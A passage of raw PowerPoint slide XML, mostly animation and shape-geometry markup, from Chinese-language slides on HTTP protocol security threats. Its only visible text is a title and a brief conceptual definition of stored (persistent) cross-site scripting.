                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56325"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56325"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="56324"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56324"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56324"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56324"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="56326"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56326"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56326"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56326"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="56340"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56340"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56340"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56340"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">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56329"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56329"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56329"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5632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56327"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56327"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56327"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56327"/>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56341"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56341"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56341"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5634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56328"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56328"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56328"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5632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6330"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="563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6331"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="563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6332"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5633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56333"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5633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56342"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="563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6344"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5634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6345"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56345"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="77" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="78" presetID="12" presetClass="entr" presetSubtype="8"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bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="56328" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="56329" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="56330" grpId="0" animBg="1"/>
      <p:bldP spid="56331" grpId="0" animBg="1"/>
      <p:bldP spid="56332" grpId="0" animBg="1"/>
      <p:bldP spid="56333" grpId="0" animBg="1"/>
      <p:bldP spid="56341" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="56342" grpId="0" animBg="1"/>
      <p:bldP spid="56344" grpId="0" animBg="1"/>
      <p:bldP spid="56345" grpId="0" animBg="1"/>
    </p:bld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标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>HTTP协议安全威胁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57348" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="2495550"/>
            <a:ext cx="8027987" cy="511175"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8028384"/>
              <a:gd name="T1" fmla="*/ 85046 h 511290"/>
              <a:gd name="T2" fmla="*/ 24951 w 8028384"/>
              <a:gd name="T3" fmla="*/ 24905 h 511290"/>
              <a:gd name="T4" fmla="*/ 85182 w 8028384"/>
              <a:gd name="T5" fmla="*/ 0 h 511290"/>
              <a:gd name="T6" fmla="*/ 7939610 w 8028384"/>
              <a:gd name="T7" fmla="*/ 0 h 511290"/>
              <a:gd name="T8" fmla="*/ 7999860 w 8028384"/>
              <a:gd name="T9" fmla="*/ 24906 h 511290"/>
              <a:gd name="T10" fmla="*/ 8024790 w 8028384"/>
              <a:gd name="T11" fmla="*/ 85047 h 511290"/>
              <a:gd name="T12" fmla="*/ 8024790 w 8028384"/>
              <a:gd name="T13" fmla="*/ 425209 h 511290"/>
              <a:gd name="T14" fmla="*/ 7999860 w 8028384"/>
              <a:gd name="T15" fmla="*/ 485350 h 511290"/>
              <a:gd name="T16" fmla="*/ 7939610 w 8028384"/>
              <a:gd name="T17" fmla="*/ 510255 h 511290"/>
              <a:gd name="T18" fmla="*/ 85181 w 8028384"/>
              <a:gd name="T19" fmla="*/ 510255 h 511290"/>
              <a:gd name="T20" fmla="*/ 24950 w 8028384"/>
              <a:gd name="T21" fmla="*/ 485349 h 511290"/>
              <a:gd name="T22" fmla="*/ 0 w 8028384"/>
              <a:gd name="T23" fmla="*/ 425208 h 511290"/>
              <a:gd name="T24" fmla="*/ 0 w 8028384"/>
              <a:gd name="T25" fmla="*/ 85046 h 5112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28384"/>
              <a:gd name="T40" fmla="*/ 0 h 511290"/>
              <a:gd name="T41" fmla="*/ 8028384 w 8028384"/>
              <a:gd name="T42" fmla="*/ 511290 h 5112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28384" h="511290">
                <a:moveTo>
                  <a:pt x="0" y="85217"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="62616"/>
                  <a:pt x="8978" y="40941"/>
                  <a:pt x="24960" y="24959"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40941" y="8978"/>
                  <a:pt x="62617" y="0"/>
                  <a:pt x="85218" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7943167" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7965768" y="0"/>
                  <a:pt x="7987443" y="8978"/>
                  <a:pt x="8003425" y="24960"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8019406" y="40941"/>
                  <a:pt x="8028384" y="62617"/>
                  <a:pt x="8028384" y="85218"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8028384" y="426073"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8028384" y="448674"/>
                  <a:pt x="8019406" y="470349"/>
                  <a:pt x="8003425" y="486331"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7987444" y="502312"/>
                  <a:pt x="7965768" y="511290"/>
                  <a:pt x="7943167" y="511290"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="85217" y="511290"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62616" y="511290"/>
                  <a:pt x="40941" y="502312"/>
                  <a:pt x="24959" y="486330"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8978" y="470349"/>
                  <a:pt x="0" y="448673"/>
                  <a:pt x="0" y="426072"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="85217"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2AA1BF"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="93539" tIns="93539" rIns="93539" bIns="9353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1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>持久性跨站（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>persistent XSS or stored XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57349" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="3006725"/>
            <a:ext cx="8027987" cy="642938"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8028384"/>
              <a:gd name="T1" fmla="*/ 0 h 642734"/>
              <a:gd name="T2" fmla="*/ 8024790 w 8028384"/>
              <a:gd name="T3" fmla="*/ 0 h 642734"/>
              <a:gd name="T4" fmla="*/ 8024790 w 8028384"/>
              <a:gd name="T5" fmla="*/ 644571 h 642734"/>
              <a:gd name="T6" fmla="*/ 0 w 8028384"/>
              <a:gd name="T7" fmla="*/ 644571 h 642734"/>
              <a:gd name="T8" fmla="*/ 0 w 8028384"/>
              <a:gd name="T9" fmla="*/ 0 h 642734"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 8028384"/>
              <a:gd name="T16" fmla="*/ 0 h 642734"/>
              <a:gd name="T17" fmla="*/ 8028384 w 8028384"/>
              <a:gd name="T18" fmla="*/ 642734 h 642734"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="8028384" h="642734">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8028384" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8028384" y="642734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="64273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901" tIns="29210" rIns="163576" bIns="2921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攻击数据存放于服务器。当用户访问正常网页时，服务端会将恶意的指令夹杂在正常网页中传回给用户</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57350" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="3651250"/>
            <a:ext cx="8027987" cy="511175"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8028384"/>
              <a:gd name="T1" fmla="*/ 85046 h 511290"/>
              <a:gd name="T2" fmla="*/ 24951 w 8028384"/>
              <a:gd name="T3" fmla="*/ 24905 h 511290"/>
              <a:gd name="T4" fmla="*/ 85182 w 8028384"/>
              <a:gd name="T5" fmla="*/ 0 h 511290"/>
              <a:gd name="T6" fmla="*/ 7939610 w 8028384"/>
              <a:gd name="T7" fmla="*/ 0 h 511290"/>
              <a:gd name="T8" fmla="*/ 7999860 w 8028384"/>
              <a:gd name="T9" fmla="*/ 24906 h 511290"/>
              <a:gd name="T10" fmla="*/ 8024790 w 8028384"/>
              <a:gd name="T11" fmla="*/ 85047 h 511290"/>
              <a:gd name="T12" fmla="*/ 8024790 w 8028384"/>
              <a:gd name="T13" fmla="*/ 425209 h 511290"/>
              <a:gd name="T14" fmla="*/ 7999860 w 8028384"/>
              <a:gd name="T15" fmla="*/ 485350 h 511290"/>
              <a:gd name="T16" fmla="*/ 7939610 w 8028384"/>
              <a:gd name="T17" fmla="*/ 510255 h 511290"/>
              <a:gd name="T18" fmla="*/ 85181 w 8028384"/>
              <a:gd name="T19" fmla="*/ 510255 h 511290"/>
              <a:gd name="T20" fmla="*/ 24950 w 8028384"/>
              <a:gd name="T21" fmla="*/ 485349 h 511290"/>
              <a:gd name="T22" fmla="*/ 0 w 8028384"/>
              <a:gd name="T23" fmla="*/ 425208 h 511290"/>
              <a:gd name="T24" fmla="*/ 0 w 8028384"/>
              <a:gd name="T25" fmla="*/ 85046 h 5112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28384"/>
              <a:gd name="T40" fmla="*/ 0 h 511290"/>
              <a:gd name="T41" fmla="*/ 8028384 w 8028384"/>
              <a:gd name="T42" fmla="*/ 511290 h 5112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28384" h="511290">
                <a:moveTo>
                  <a:pt x="0" y="85217"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="62616"/>
                  <a:pt x="8978" y="40941"/>
                  <a:pt x="24960" y="24959"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40941" y="8978"/>
                  <a:pt x="62617" y="0"/>
                  <a:pt x="85218" y="0"/>
                </a:cubicBezTo>
